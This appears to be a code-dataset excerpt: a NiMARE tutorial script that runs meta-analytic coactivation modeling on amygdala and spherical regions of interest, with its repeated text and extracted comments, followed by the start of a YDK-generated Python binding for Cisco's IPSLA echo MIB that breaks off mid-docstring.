data_path = repo2data.install()
data_path = os.path.join(data_path[0], "data")
# Now, load the Datasets we will use in this chapter
neurosynth_dset = nimare.dataset.Dataset.load(os.path.join(data_path, "neurosynth_dataset.pkl.gz"))
# Meta-analytic coactivation modeling (MACM) {cite:p}`Laird2009-gc,Robinson2010-iv,Eickhoff2010-vx`, also known as meta-analytic connectivity modeling, uses meta-analytic data to measure co-occurrence of activations between brain regions providing evidence of functional connectivity of brain regions across tasks.
# In coordinate-based MACM, whole-brain studies within the database are selected based on whether or not they report at least one peak in a region of interest specified for the analysis.
# These studies are then subjected to a meta-analysis, often comparing the selected studies to those remaining in the database.
# In this way, the significance of each voxel in the analysis corresponds to whether there is greater convergence of foci at the voxel among studies which also report foci in the region of interest than those which do not.
#
# <!-- TODO: Determine appropriate citation style here. -->
#
# MACM results have historically been accorded a similar interpretation to task-related functional connectivity (e.g., {cite:p}`Hok2015-lt,Kellermann2013-en`), although this approach is quite removed from functional connectivity analyses of task fMRI data (e.g., beta-series correlations, psychophysiological interactions, or even seed-to-voxel functional connectivity analyses on task data).
# Nevertheless, MACM analyses do show high correspondence with resting-state functional connectivity {cite:p}`Reid2017-ez`.
# MACM has been used to characterize the task-based functional coactivation of the cerebellum {cite:p}`Riedel2015-tx`, lateral prefrontal cortex {cite:p}`Reid2016-ba`, fusiform gyrus {cite:p}`Caspers2014-ja`, and several other brain regions.
#
# Within NiMARE, MACMs can be performed by selecting studies in a Dataset based on the presence of activation within a target mask or coordinate-centered sphere.
#
# In this section, we will perform two MACMs- one with a target mask and one with a coordinate-centered sphere.
# For the former, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_mask`.
# For the latter, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_coordinate`.
# In[2]:
# Create Dataset only containing studies with peaks within the amygdala mask
amygdala_mask = os.path.join(data_path, "amygdala_roi.nii.gz")
amygdala_ids = neurosynth_dset.get_studies_by_mask(amygdala_mask)
dset_amygdala = neurosynth_dset.slice(amygdala_ids)
# Create Dataset only containing studies with peaks within the sphere ROI
sphere_ids = neurosynth_dset.get_studies_by_coordinate([[24, -2, -20]], r=6)
dset_sphere = neurosynth_dset.slice(sphere_ids)
# In[3]:
import numpy as np
from nilearn import input_data, plotting
# In order to plot a sphere with a precise radius around a coordinate with
# nilearn, we need to use a NiftiSpheresMasker
mask_img = neurosynth_dset.masker.mask_img
sphere_masker = input_data.NiftiSpheresMasker([[24, -2, -20]], radius=6, mask_img=mask_img)
sphere_masker.fit(mask_img)
sphere_img = sphere_masker.inverse_transform(np.array([[1]]))
fig, axes = plt.subplots(figsize=(6, 4), nrows=2)
display = plotting.plot_roi(
amygdala_mask,
annotate=False,
draw_cross=False,
axes=axes[0],
figure=fig,
)
axes[0].set_title("Amygdala ROI")
display = plotting.plot_roi(
sphere_img,
annotate=False,
draw_cross=False,
axes=axes[1],
figure=fig,
)
axes[1].set_title("Spherical ROI")
glue("figure_macm_rois", fig, display=False)
# ```{glue:figure} figure_macm_rois
# :name: figure_macm_rois
# :align: center
#
# Region of interest masks for (1) a target mask-based MACM and (2) a coordinate-based MACM.
# ```
# Once the `Dataset` has been reduced to studies with coordinates within the mask or sphere requested, any of the supported CBMA Estimators can be run.
# In[4]:
from nimare import meta
meta_amyg = meta.cbma.ale.ALE(kernel__sample_size=20)
results_amyg = meta_amyg.fit(dset_amygdala)
meta_sphere = meta.cbma.ale.ALE(kernel__sample_size=20)
results_sphere = meta_sphere.fit(dset_sphere)
# In[5]:
meta_results = {
"Amygdala ALE MACM": results_amyg.get_map("z", return_type="image"),
"Sphere ALE MACM": results_sphere.get_map("z", return_type="image"),
}
fig, axes = plt.subplots(figsize=(6, 4), nrows=2)
for i_meta, (name, file_) in enumerate(meta_results.items()):
display = plotting.plot_stat_map(
file_,
annotate=False,
axes=axes[i_meta],
cmap="Reds",
cut_coords=[24, -2, -20],
draw_cross=False,
figure=fig,
)
axes[i_meta].set_title(name)
colorbar = display._cbar
colorbar_ticks = colorbar.get_ticks()
if colorbar_ticks[0] < 0:
new_ticks = [colorbar_ticks[0], 0, colorbar_ticks[-1]]
else:
new_ticks = [colorbar_ticks[0], colorbar_ticks[-1]]
colorbar.set_ticks(new_ticks, update_ticks=True)
glue("figure_macm", fig, display=False)
# ```{glue:figure} figure_macm
# :name: figure_macm
# :align: center
#
# Unthresholded z-statistic maps for (1) the target mask-based MACM and (2) the coordinate-based MACM.
# ```
# In[6]:
end = datetime.now()
print(f"macm.md took {end - start} to build.")
| #!/usr/bin/env python
# coding: utf-8
# # Meta-Analytic Coactivation Modeling
# In[1]:
# First, import the necessary modules and functions
import os
from datetime import datetime
import matplotlib.pyplot as plt
from myst_nb import glue
from repo2data.repo2data import Repo2Data
import nimare
start = datetime.now()
# Install the data if running locally, or points to cached data if running on neurolibre
DATA_REQ_FILE = os.path.join("../binder/data_requirement.json")
FIG_DIR = os.path.abspath("../images")
# Download data
repo2data = Repo2Data(DATA_REQ_FILE)
data_path = repo2data.install()
data_path = os.path.join(data_path[0], "data")
# Now, load the Datasets we will use in this chapter
neurosynth_dset = nimare.dataset.Dataset.load(os.path.join(data_path, "neurosynth_dataset.pkl.gz"))
# Meta-analytic coactivation modeling (MACM) {cite:p}`Laird2009-gc,Robinson2010-iv,Eickhoff2010-vx`, also known as meta-analytic connectivity modeling, uses meta-analytic data to measure co-occurrence of activations between brain regions providing evidence of functional connectivity of brain regions across tasks.
# In coordinate-based MACM, whole-brain studies within the database are selected based on whether or not they report at least one peak in a region of interest specified for the analysis.
# These studies are then subjected to a meta-analysis, often comparing the selected studies to those remaining in the database.
# In this way, the significance of each voxel in the analysis corresponds to whether there is greater convergence of foci at the voxel among studies which also report foci in the region of interest than those which do not.
#
# <!-- TODO: Determine appropriate citation style here. -->
#
# MACM results have historically been accorded a similar interpretation to task-related functional connectivity (e.g., {cite:p}`Hok2015-lt,Kellermann2013-en`), although this approach is quite removed from functional connectivity analyses of task fMRI data (e.g., beta-series correlations, psychophysiological interactions, or even seed-to-voxel functional connectivity analyses on task data).
# Nevertheless, MACM analyses do show high correspondence with resting-state functional connectivity {cite:p}`Reid2017-ez`.
# MACM has been used to characterize the task-based functional coactivation of the cerebellum {cite:p}`Riedel2015-tx`, lateral prefrontal cortex {cite:p}`Reid2016-ba`, fusiform gyrus {cite:p}`Caspers2014-ja`, and several other brain regions.
#
# Within NiMARE, MACMs can be performed by selecting studies in a Dataset based on the presence of activation within a target mask or coordinate-centered sphere.
#
# In this section, we will perform two MACMs- one with a target mask and one with a coordinate-centered sphere.
# For the former, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_mask`.
# For the latter, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_coordinate`.
# In[2]:
# Create Dataset only containing studies with peaks within the amygdala mask
amygdala_mask = os.path.join(data_path, "amygdala_roi.nii.gz")
amygdala_ids = neurosynth_dset.get_studies_by_mask(amygdala_mask)
dset_amygdala = neurosynth_dset.slice(amygdala_ids)
# Create Dataset only containing studies with peaks within the sphere ROI
sphere_ids = neurosynth_dset.get_studies_by_coordinate([[24, -2, -20]], r=6)
dset_sphere = neurosynth_dset.slice(sphere_ids)
# In[3]:
import numpy as np
from nilearn import input_data, plotting
# In order to plot a sphere with a precise radius around a coordinate with
# nilearn, we need to use a NiftiSpheresMasker
mask_img = neurosynth_dset.masker.mask_img
sphere_masker = input_data.NiftiSpheresMasker([[24, -2, -20]], radius=6, mask_img=mask_img)
sphere_masker.fit(mask_img)
sphere_img = sphere_masker.inverse_transform(np.array([[1]]))
fig, axes = plt.subplots(figsize=(6, 4), nrows=2)
display = plotting.plot_roi(
amygdala_mask,
annotate=False,
draw_cross=False,
axes=axes[0],
figure=fig,
)
axes[0].set_title("Amygdala ROI")
display = plotting.plot_roi(
sphere_img,
annotate=False,
draw_cross=False,
axes=axes[1],
figure=fig,
)
axes[1].set_title("Spherical ROI")
glue("figure_macm_rois", fig, display=False)
# ```{glue:figure} figure_macm_rois
# :name: figure_macm_rois
# :align: center
#
# Region of interest masks for (1) a target mask-based MACM and (2) a coordinate-based MACM.
# ```
# Once the `Dataset` has been reduced to studies with coordinates within the mask or sphere requested, any of the supported CBMA Estimators can be run.
# In[4]:
from nimare import meta
meta_amyg = meta.cbma.ale.ALE(kernel__sample_size=20)
results_amyg = meta_amyg.fit(dset_amygdala)
meta_sphere = meta.cbma.ale.ALE(kernel__sample_size=20)
results_sphere = meta_sphere.fit(dset_sphere)
# In[5]:
meta_results = {
"Amygdala ALE MACM": results_amyg.get_map("z", return_type="image"),
"Sphere ALE MACM": results_sphere.get_map("z", return_type="image"),
}
fig, axes = plt.subplots(figsize=(6, 4), nrows=2)
for i_meta, (name, file_) in enumerate(meta_results.items()):
display = plotting.plot_stat_map(
file_,
annotate=False,
axes=axes[i_meta],
cmap="Reds",
cut_coords=[24, -2, -20],
draw_cross=False,
figure=fig,
)
axes[i_meta].set_title(name)
colorbar = display._cbar
colorbar_ticks = colorbar.get_ticks()
if colorbar_ticks[0] < 0:
new_ticks = [colorbar_ticks[0], 0, colorbar_ticks[-1]]
else:
new_ticks = [colorbar_ticks[0], colorbar_ticks[-1]]
colorbar.set_ticks(new_ticks, update_ticks=True)
glue("figure_macm", fig, display=False)
# ```{glue:figure} figure_macm
# :name: figure_macm
# :align: center
#
# Unthresholded z-statistic maps for (1) the target mask-based MACM and (2) the coordinate-based MACM.
# ```
# In[6]:
end = datetime.now()
print(f"macm.md took {end - start} to build.") | en | 0.817132 | #!/usr/bin/env python # coding: utf-8 # # Meta-Analytic Coactivation Modeling # In[1]: # First, import the necessary modules and functions # Install the data if running locally, or points to cached data if running on neurolibre # Download data # Now, load the Datasets we will use in this chapter # Meta-analytic coactivation modeling (MACM) {cite:p}`Laird2009-gc,Robinson2010-iv,Eickhoff2010-vx`, also known as meta-analytic connectivity modeling, uses meta-analytic data to measure co-occurrence of activations between brain regions providing evidence of functional connectivity of brain regions across tasks. # In coordinate-based MACM, whole-brain studies within the database are selected based on whether or not they report at least one peak in a region of interest specified for the analysis. # These studies are then subjected to a meta-analysis, often comparing the selected studies to those remaining in the database. # In this way, the significance of each voxel in the analysis corresponds to whether there is greater convergence of foci at the voxel among studies which also report foci in the region of interest than those which do not. # # <!-- TODO: Determine appropriate citation style here. --> # # MACM results have historically been accorded a similar interpretation to task-related functional connectivity (e.g., {cite:p}`Hok2015-lt,Kellermann2013-en`), although this approach is quite removed from functional connectivity analyses of task fMRI data (e.g., beta-series correlations, psychophysiological interactions, or even seed-to-voxel functional connectivity analyses on task data). # Nevertheless, MACM analyses do show high correspondence with resting-state functional connectivity {cite:p}`Reid2017-ez`. # MACM has been used to characterize the task-based functional coactivation of the cerebellum {cite:p}`Riedel2015-tx`, lateral prefrontal cortex {cite:p}`Reid2016-ba`, fusiform gyrus {cite:p}`Caspers2014-ja`, and several other brain regions. # # Within NiMARE, MACMs can be performed by selecting studies in a Dataset based on the presence of activation within a target mask or coordinate-centered sphere. # # In this section, we will perform two MACMs- one with a target mask and one with a coordinate-centered sphere. # For the former, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_mask`. # For the latter, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_coordinate`. # In[2]: # Create Dataset only containing studies with peaks within the amygdala mask # Create Dataset only containing studies with peaks within the sphere ROI # In[3]: # In order to plot a sphere with a precise radius around a coordinate with # nilearn, we need to use a NiftiSpheresMasker # ```{glue:figure} figure_macm_rois # :name: figure_macm_rois # :align: center # # Region of interest masks for (1) a target mask-based MACM and (2) a coordinate-based MACM. # ``` # Once the `Dataset` has been reduced to studies with coordinates within the mask or sphere requested, any of the supported CBMA Estimators can be run. # In[4]: # In[5]: # ```{glue:figure} figure_macm # :name: figure_macm # :align: center # # Unthresholded z-statistic maps for (1) the target mask-based MACM and (2) the coordinate-based MACM. # ``` # In[6]: | 2.356604 | 2 |
cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IPSLA_ECHO_MIB.py | Maikor/ydk-py | 0 | 8050 | <filename>cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IPSLA_ECHO_MIB.py
""" CISCO_IPSLA_ECHO_MIB
This MIB module defines the templates for IP SLA operations of
ICMP echo, UDP echo and TCP connect.
The ICMP echo operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken between sending an ICMP echo request message to the
destination and receiving an ICMP echo reply.
The UDP echo operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken between sending an UDP echo request message to the
destination and receiving an UDP echo reply.
The TCP connect operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken to perform a TCP connect operation.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class CISCOIPSLAECHOMIB(Entity):
"""
.. attribute:: cipslaicmpechotmpltable
A table that contains ICMP echo template definitions
**type**\: :py:class:`CipslaIcmpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable>`
.. attribute:: cipslaudpechotmpltable
A table that contains UDP echo template specific definitions
**type**\: :py:class:`CipslaUdpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable>`
.. attribute:: cipslatcpconntmpltable
A table that contains TCP connect template specific definitions
**type**\: :py:class:`CipslaTcpConnTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB, self).__init__()
self._top_entity = None
self.yang_name = "CISCO-IPSLA-ECHO-MIB"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaIcmpEchoTmplTable", ("cipslaicmpechotmpltable", CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable)), ("cipslaUdpEchoTmplTable", ("cipslaudpechotmpltable", CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable)), ("cipslaTcpConnTmplTable", ("cipslatcpconntmpltable", CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable))])
self._leafs = OrderedDict()
self.cipslaicmpechotmpltable = CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable()
self.cipslaicmpechotmpltable.parent = self
self._children_name_map["cipslaicmpechotmpltable"] = "cipslaIcmpEchoTmplTable"
self.cipslaudpechotmpltable = CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable()
self.cipslaudpechotmpltable.parent = self
self._children_name_map["cipslaudpechotmpltable"] = "cipslaUdpEchoTmplTable"
self.cipslatcpconntmpltable = CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable()
self.cipslatcpconntmpltable.parent = self
self._children_name_map["cipslatcpconntmpltable"] = "cipslaTcpConnTmplTable"
self._segment_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB, [], name, value)
class CipslaIcmpEchoTmplTable(Entity):
"""
A table that contains ICMP echo template definitions.
.. attribute:: cipslaicmpechotmplentry
A row entry representing an IPSLA ICMP echo template
**type**\: list of :py:class:`CipslaIcmpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable, self).__init__()
self.yang_name = "cipslaIcmpEchoTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaIcmpEchoTmplEntry", ("cipslaicmpechotmplentry", CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry))])
self._leafs = OrderedDict()
self.cipslaicmpechotmplentry = YList(self)
self._segment_path = lambda: "cipslaIcmpEchoTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable, [], name, value)
class CipslaIcmpEchoTmplEntry(Entity):
"""
A row entry representing an IPSLA ICMP echo template.
.. attribute:: cipslaicmpechotmplname (key)
This field is used to specify the ICMP echo template name
**type**\: str
**length:** 1..64
.. attribute:: cipslaicmpechotmpldescription
This field is used to provide description for the ICMP echo template
**type**\: str
**length:** 0..128
.. attribute:: cipslaicmpechotmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaIcmpEchoTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslaicmpechotmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslaicmpechotmpltimeout
Specifies the duration to wait for a IP SLA operation completion. For connection oriented protocols, this may cause the connection to be closed by the operation. Once closed, it will be assumed that the connection reestablishment will be performed. To prevent unwanted closure of connections, be sure to set this value to a realistic connection timeout
**type**\: int
**range:** 0..604800000
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplverifydata
When set to true, the resulting data in each IP SLA operation is compared with the expected data. This includes checking header information (if possible) and exact packet size
**type**\: bool
.. attribute:: cipslaicmpechotmplreqdatasize
This object represents the number of octets to be placed into the ARR Data portion of the request message, when using SNA protocols. For non\-ARR protocols' IP SLA request/responses, this value represents the native payload size. REMEMBER\: The ARR Header overhead is not included in this value
**type**\: int
**range:** 0..16384
**units**\: octets
.. attribute:: cipslaicmpechotmpltos
This object represents the type of service octet in an IP header
**type**\: int
**range:** 0..255
.. attribute:: cipslaicmpechotmplvrfname
This field is used to specify the VRF name with which the IP SLA operation will be used. For regular IP SLA operation this field should not be configured. The agent will use this field to identify the VRF routing table for this operation
**type**\: str
**length:** 0..32
.. attribute:: cipslaicmpechotmplthreshold
This object defines an administrative threshold limit. If the IP SLA operation time exceeds this limit and if the condition specified in cipslaIcmpEchoTmplHistFilter is satisfied, one threshold crossing occurrence will be counted
**type**\: int
**range:** 0..2147483647
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplhistlives
The maximum number of history lives to record. A life is defined by the countdown (or transition) to zero by the cipslaAutoGroupScheduleLife object. A new life is created when the same conceptual control row is restarted via the transition of the cipslaAutoGroupScheduleLife object and its subsequent countdown. The value of zero will shut off all data collection
**type**\: int
**range:** 0..2
.. attribute:: cipslaicmpechotmplhistbuckets
The maximum number of history buckets to record. This value is set to the number of operations to keep per lifetime. After cipslaIcmpEchoTmplHistBuckets are filled, the oldest entries are deleted and the most recent cipslaIcmpEchoTmplHistBuckets buckets are retained
**type**\: int
**range:** 1..60
.. attribute:: cipslaicmpechotmplhistfilter
Defines a filter for adding RTT results to the history buffer\: none(1) \- no history is recorded all(2) \- the results of all completion times and failed completions are recorded overThreshold(3) \- the results of completion times over cipslaIcmpEchoTmplThreshold are recorded. failures(4) \- the results of failed operations (only) are recorded
**type**\: :py:class:`CipslaIcmpEchoTmplHistFilter <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry.CipslaIcmpEchoTmplHistFilter>`
.. attribute:: cipslaicmpechotmplstatshours
The maximum number of hours for which statistics are maintained. Specifically this is the number of hourly groups to keep before rolling over. The value of one is not advisable because the hourly group will close and immediately be deleted before the network management station will have the opportunity to retrieve the statistics. The value of zero will shut off data collection
**type**\: int
**range:** 0..25
**units**\: hours
.. attribute:: cipslaicmpechotmpldistbuckets
The maximum number of statistical distribution buckets to accumulate. Since this index does not rollover, only the first cipslaIcmpEchoTmplStatsNumDistBuckets will be kept. The last cipslaIcmpEchoTmplStatsNumDistBucket will contain all entries from its distribution interval start point to infinity
**type**\: int
**range:** 1..20
.. attribute:: cipslaicmpechotmpldistinterval
The statistical distribution buckets interval. Distribution Bucket Example\: cipslaIcmpEchoTmplDistBuckets = 5 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| Bucket 2 \| Bucket 3 \| Bucket 4 \| Bucket 5 \| \| 0\-9 ms \| 10\-19 ms \| 20\-29 ms \| 30\-39 ms \| 40\-Inf ms \| Odd Example\: cipslaIcmpEchoTmplDistBuckets = 1 buckets cipslaIcmpEchoTmplDistInterval = 10 milliseconds \| Bucket 1 \| \| 0\-Inf ms \| Thus, this odd example shows that the value of cipslaIcmpEchoTmplDistInterval does not apply when cipslaIcmpEchoTmplDistBuckets is one
**type**\: int
**range:** 1..100
**units**\: milliseconds
.. attribute:: cipslaicmpechotmplstoragetype
The storage type of this conceptual row
**type**\: :py:class:`StorageType <ydk.models.cisco_ios_xe.SNMPv2_TC.StorageType>`
.. attribute:: cipslaicmpechotmplrowstatus
The status of the conceptual ICMP echo template control row. When the status is active, all the read\-create objects in that row can be modified
**type**\: :py:class:`RowStatus <ydk.models.cisco_ios_xe.SNMPv2_TC.RowStatus>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry, self).__init__()
self.yang_name = "cipslaIcmpEchoTmplEntry"
self.yang_parent_name = "cipslaIcmpEchoTmplTable"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['cipslaicmpechotmplname']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('cipslaicmpechotmplname', (YLeaf(YType.str, 'cipslaIcmpEchoTmplName'), ['str'])),
('cipslaicmpechotmpldescription', (YLeaf(YType.str, 'cipslaIcmpEchoTmplDescription'), ['str'])),
('cipslaicmpechotmplsrcaddrtype', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplSrcAddrType'), [('ydk.models.cisco_ios_xe.INET_ADDRESS_MIB', 'InetAddressType', '')])),
('cipslaicmpechotmplsrcaddr', (YLeaf(YType.str, 'cipslaIcmpEchoTmplSrcAddr'), ['str'])),
('cipslaicmpechotmpltimeout', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplTimeOut'), ['int'])),
('cipslaicmpechotmplverifydata', (YLeaf(YType.boolean, 'cipslaIcmpEchoTmplVerifyData'), ['bool'])),
('cipslaicmpechotmplreqdatasize', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplReqDataSize'), ['int'])),
('cipslaicmpechotmpltos', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplTOS'), ['int'])),
('cipslaicmpechotmplvrfname', (YLeaf(YType.str, 'cipslaIcmpEchoTmplVrfName'), ['str'])),
('cipslaicmpechotmplthreshold', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplThreshold'), ['int'])),
('cipslaicmpechotmplhistlives', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplHistLives'), ['int'])),
('cipslaicmpechotmplhistbuckets', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplHistBuckets'), ['int'])),
('cipslaicmpechotmplhistfilter', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplHistFilter'), [('ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB', 'CISCOIPSLAECHOMIB', 'CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry.CipslaIcmpEchoTmplHistFilter')])),
('cipslaicmpechotmplstatshours', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplStatsHours'), ['int'])),
('cipslaicmpechotmpldistbuckets', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplDistBuckets'), ['int'])),
('cipslaicmpechotmpldistinterval', (YLeaf(YType.uint32, 'cipslaIcmpEchoTmplDistInterval'), ['int'])),
('cipslaicmpechotmplstoragetype', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplStorageType'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'StorageType', '')])),
('cipslaicmpechotmplrowstatus', (YLeaf(YType.enumeration, 'cipslaIcmpEchoTmplRowStatus'), [('ydk.models.cisco_ios_xe.SNMPv2_TC', 'RowStatus', '')])),
])
self.cipslaicmpechotmplname = None
self.cipslaicmpechotmpldescription = None
self.cipslaicmpechotmplsrcaddrtype = None
self.cipslaicmpechotmplsrcaddr = None
self.cipslaicmpechotmpltimeout = None
self.cipslaicmpechotmplverifydata = None
self.cipslaicmpechotmplreqdatasize = None
self.cipslaicmpechotmpltos = None
self.cipslaicmpechotmplvrfname = None
self.cipslaicmpechotmplthreshold = None
self.cipslaicmpechotmplhistlives = None
self.cipslaicmpechotmplhistbuckets = None
self.cipslaicmpechotmplhistfilter = None
self.cipslaicmpechotmplstatshours = None
self.cipslaicmpechotmpldistbuckets = None
self.cipslaicmpechotmpldistinterval = None
self.cipslaicmpechotmplstoragetype = None
self.cipslaicmpechotmplrowstatus = None
self._segment_path = lambda: "cipslaIcmpEchoTmplEntry" + "[cipslaIcmpEchoTmplName='" + str(self.cipslaicmpechotmplname) + "']"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/cipslaIcmpEchoTmplTable/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry, ['cipslaicmpechotmplname', 'cipslaicmpechotmpldescription', 'cipslaicmpechotmplsrcaddrtype', 'cipslaicmpechotmplsrcaddr', 'cipslaicmpechotmpltimeout', 'cipslaicmpechotmplverifydata', 'cipslaicmpechotmplreqdatasize', 'cipslaicmpechotmpltos', 'cipslaicmpechotmplvrfname', 'cipslaicmpechotmplthreshold', 'cipslaicmpechotmplhistlives', 'cipslaicmpechotmplhistbuckets', 'cipslaicmpechotmplhistfilter', 'cipslaicmpechotmplstatshours', 'cipslaicmpechotmpldistbuckets', 'cipslaicmpechotmpldistinterval', 'cipslaicmpechotmplstoragetype', 'cipslaicmpechotmplrowstatus'], name, value)
class CipslaIcmpEchoTmplHistFilter(Enum):
"""
CipslaIcmpEchoTmplHistFilter (Enum Class)
Defines a filter for adding RTT results to the history
buffer\:
none(1) \- no history is recorded
all(2) \- the results of all completion times
and failed completions are recorded
overThreshold(3) \- the results of completion times
over cipslaIcmpEchoTmplThreshold are
recorded.
failures(4) \- the results of failed operations (only)
are recorded.
.. data:: none = 1
.. data:: all = 2
.. data:: overThreshold = 3
.. data:: failures = 4
"""
none = Enum.YLeaf(1, "none")
all = Enum.YLeaf(2, "all")
overThreshold = Enum.YLeaf(3, "overThreshold")
failures = Enum.YLeaf(4, "failures")
class CipslaUdpEchoTmplTable(Entity):
"""
A table that contains UDP echo template specific definitions.
.. attribute:: cipslaudpechotmplentry
A row entry representing an IPSLA UDP echo template
**type**\: list of :py:class:`CipslaUdpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable, self).__init__()
self.yang_name = "cipslaUdpEchoTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaUdpEchoTmplEntry", ("cipslaudpechotmplentry", CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable.CipslaUdpEchoTmplEntry))])
self._leafs = OrderedDict()
self.cipslaudpechotmplentry = YList(self)
self._segment_path = lambda: "cipslaUdpEchoTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable, [], name, value)
class CipslaUdpEchoTmplEntry(Entity):
"""
A row entry representing an IPSLA UDP echo template.
.. attribute:: cipslaudpechotmplname (key)
A string which specifies the UDP echo template name
**type**\: str
**length:** 1..64
.. attribute:: cipslaudpechotmpldescription
A string which provides description to the UDP echo template
**type**\: str
**length:** 0..128
.. attribute:: cipslaudpechotmplcontrolenable
If this object is enabled, then the IP SLA application will send control messages to a responder, residing on the target router to respond to the data request packets being sent by the source router
**type**\: bool
.. attribute:: cipslaudpechotmplsrcaddrtype
An enumerated value which specifies the IP address type of the source. It must be used along with the cipslaUdpEchoTmplSrcAddr object
**type**\: :py:class:`InetAddressType <ydk.models.cisco_ios_xe.INET_ADDRESS_MIB.InetAddressType>`
.. attribute:: cipslaudpechotmplsrcaddr
A string which specifies the IP address of the source
**type**\: str
**length:** 0..255
.. attribute:: cipslaudpechotmplsrcport
This object represents the source's port number. If this object is not specified, the application will get a port allocated by the system
**type**\: int
**range:** 0..65535
.. attribute:: cipslaudpechotmpltimeout
